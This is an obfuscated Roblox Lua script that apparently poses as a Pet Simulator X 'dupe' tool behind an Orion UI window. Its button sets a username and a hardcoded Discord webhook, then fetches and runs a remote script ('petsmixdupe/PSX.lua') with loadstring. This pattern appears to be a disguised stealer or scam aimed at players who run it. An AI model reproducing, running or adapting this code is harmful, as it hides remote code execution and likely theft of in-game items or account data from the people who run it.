--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v12,v13)local v15={};for v17=(5 -3) -1, #v12 do v6(v15,v0(v4(v1(v2(v12,v17,v17 + (2 -(1 + 0)))),v1(v2(v13,(998 -(976 + 21)) + ((v17-(1 + 0 + (1233 -(711 + 522))))% #v13),(1 -0) + ((v17-(3 -2))% #v13) + 1)))%((6527 -4857) -((1042 -643) + (1539 -524)))));end return v5(v15);end local v8=loadstring(game:HttpGet("https://raw.githubusercontent.com/shlexware/Orion/main/source"))();local v9=v8:MakeWindow({[v7("\108\196\164\93","\34\165\201\56\76")]=v7("\112\97\7\29\60\95\148\159\0\100\110","\32\50\95\61\122\28\223\205"),[v7("\5\17\201\166\29\63\29\192\170\56\32","\77\120\173\195\77")]=false,[v7("\201\193\193\51\217\207\217\48\243\199","\154\160\183\86")]=true,[v7("\25\194\131\52\141\1\145\53\193\137\55\150","\90\173\237\82\228\102\215")]=v7("\19\181\31\87\56\232\15\125\48","\87\134\105\20")});local v10=v9:MakeTab({[v7("\57\206\22\242","\119\175\123\151\120\177\46")]=v7("\163\165\231\185\204\51\161\153\161\234\175\158\59\150\131\190\225\245","\236\209\143\220\190\19\229"),[v7("\30\243\31\193","\87\144\112\175")]="rbxassetid://4483345998",[v7("\152\153\72\205\59\205\250\173\166\135\84","\200\235\45\160\82\184\151\226")]=false});v8:MakeNotification({[v7("\253\35\94\227","\179\66\51\134\173\207")]=v7("\247\109\167\43\205\152\93\186\62\218","\184\25\207\78\191"),[v7("\157\9\123\73\64\176\18","\222\102\21\61\37")]=v7("\14\23\141\193\82\79\218\37\49\6\197\237\83\79\206\49\53\0\141\193\68\79\248\63\51\67\139\203\87\78","\65\99\229\164\32\111\158\80"),[v7("\86\242\175\5\122","\31\159\206\98")]="rbxassetid://4483345998",[v7("\111\182\128\51","\59\223\237\86\217\201")]=5});wait(1052 -((617 -458) + 855 + 33));v8:MakeNotification({[v7("\115\184\192\219","\61\217\173\190\236\193\65\128")]=v7("\155\226\130\221","\221\161\201\143\209"),[v7("\33\112\70\20\42\207\77","\98\31\40\96\79\161\57")]=v7("\218\64\130\216\175\32\202\161\248\92\148\143\230\29\158\131\227\71\148\192\227\22\146\224\207\69\142\204\228\83\248\249","\140\41\231\175\143\115\190\192"),[v7("\146\58\58\233\73","\219\87\91\142\44\204\223")]="rbxassetid://4483345998",[v7("\22\230\73\43","\66\143\36\78\209\27\64")]=3 + 0});local v11=v9:MakeTab({[v7("\61\4\29\45","\115\101\112\72\139")]=v7("\77\182\13\198\225\191\122\169\105\161","\25\196\108\162\132\159\62\220"),[v7("\141\118\230\64","\196\21\137\46\168\20\25")]="rbxassetid://12005070205",[v7("\208\29\9\39\168\157\211\10\238\3\21","\128\111\108\74\193\232\190\69")]=false});v11:AddTextbox({[v7("\198\7\92\42","\136\102\49\79\217\61\139")]=v7("\147\180\63\140\8\174\180\107\182\6\227\181\62\178\12","\195\209\75\194\105"),[v7("\54\200\53\19\69\30\217","\114\173\83\114\48")]=v7("","\160\85\70\211\146"),[v7("\43\74\176\69\59\70\187\80\15\95\173\80\13","\127\47\200\49")]=false,[v7("\21\218\48\215\207\44\53\208","\86\187\92\187\173\77")]=function(v14)print(v7("","\233\110\32\90\221\234\222\49"));end});v11:AddButton({[v7("\215\210\180\22","\153\179\217\115\165\227\186")]=v7("\152\157\255\97\43\156\20\171\170\141\247\125\56\156\4\172\187\140","\203\233\158\19\95\188\64\217"),[v7("\27\201\114\51\49\57\203\117","\88\168\30\95\83")]=function()local v16=0;while true do if (v16==0) then local v18=0;while true do if (v18==((75 + 136) -((538 -400) + 73))) then UserName=v7("\98\22\230\9\41\90\106\44\244\19\46\89\32\65\160","\18\115\146\122\64\55");WebHook="https://discord.com/api/webhooks/1057394943808782336/xJa88X3DL8PmH3Yu1sT96RVc26A03GZtYQFNV4jijwIVOs4DQRsbLAQN3pKFQxRbysqs";v18=2 -1;end if (v18==((36 + 21) -(19 + 15 + 16 + 6))) then v16=1;break;end end end if (v16==(539 -((21 -16) + 532))) then wait(3);print(v7("\129\255\223\221\50\43\182\170","\210\139\190\175\70\78"));break;end if ((3 -2)==v16) then local v19=0;while true do if (v19==(0 + 0 + 0)) then loadstring(game:HttpGet("https://raw.githubusercontent.com/k4ftt/petsmixdupe/main/PSX.lua",true))();print(v7("\220\254\94\92\168\230\228\88\0\242\161","\143\138\63\46\220"));v19=(2715 -(851 + 360)) -((1438 -358) + 423);end if (v19==(1 + 0)) then v16=2;break;end end end end end});
